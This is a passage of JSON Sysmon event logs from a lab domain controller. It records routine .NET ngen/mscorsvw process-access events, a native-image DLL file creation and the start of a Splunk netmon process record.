{A837DB8D-04D7-5F25-0000-001039611100}\r\nTargetProcessId: 2208\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:51.293","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04D7-5F25-0000-001039611100}","TargetProcessId":"2208","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7707,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:51.309\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04D7-5F25-0000-001039611100}\r\nTargetProcessId: 2208\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:51.309","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04D7-5F25-0000-001039611100}","TargetProcessId":"2208","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7708,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:51.340\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04D7-5F25-0000-0010C0641100}\r\nTargetProcessId: 2640\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:51.340","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04D7-5F25-0000-0010C0641100}","TargetProcessId":"2640","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7709,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:51.340\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04D7-5F25-0000-0010C0641100}\r\nTargetProcessId: 2640\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:51.340","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04D7-5F25-0000-0010C0641100}","TargetProcessId":"2640","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7710,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:51.340\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04D7-5F25-0000-0010C0641100}\r\nTargetProcessId: 2640\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:51.340","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04D7-5F25-0000-0010C0641100}","TargetProcessId":"2640","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7711,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:51.387\r\nProcessGuid: {A837DB8D-04D7-5F25-0000-0010C0641100}\r\nProcessId: 2640\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\a50-0\\System.ServiceModel.ServiceMoniker40.dll\r\nCreationUtcTime: 2020-08-01 05:59:51.387","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:51.387","ProcessGuid":"{A837DB8D-04D7-5F25-0000-0010C0641100}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\a50-0\\System.ServiceModel.ServiceMoniker40.dll","CreationUtcTime":"2020-08-01 05:59:51.387","EventReceivedTime":"2020-08-01 05:59:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7712,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:51.418\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04D7-5F25-0000-0010296A1100}\r\nTargetProcessId: 4540\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:51.418","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04D7-5F25-0000-0010296A1100}","TargetProcessId":"4540","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7713,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:51.418\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04D7-5F25-0000-0010296A1100}\r\nTargetProcessId: 4540\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:51.418","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04D7-5F25-0000-0010296A1100}","TargetProcessId":"4540","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7714,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:51.434\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04D7-5F25-0000-0010296A1100}\r\nTargetProcessId: 4540\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:51.434","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04D7-5F25-0000-0010296A1100}","TargetProcessId":"4540","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":7715,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:51.515\r\nProcessGuid: {A837DB8D-04D7-5F25-0000-00103C6E1100}\r\nProcessId: 1540\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: 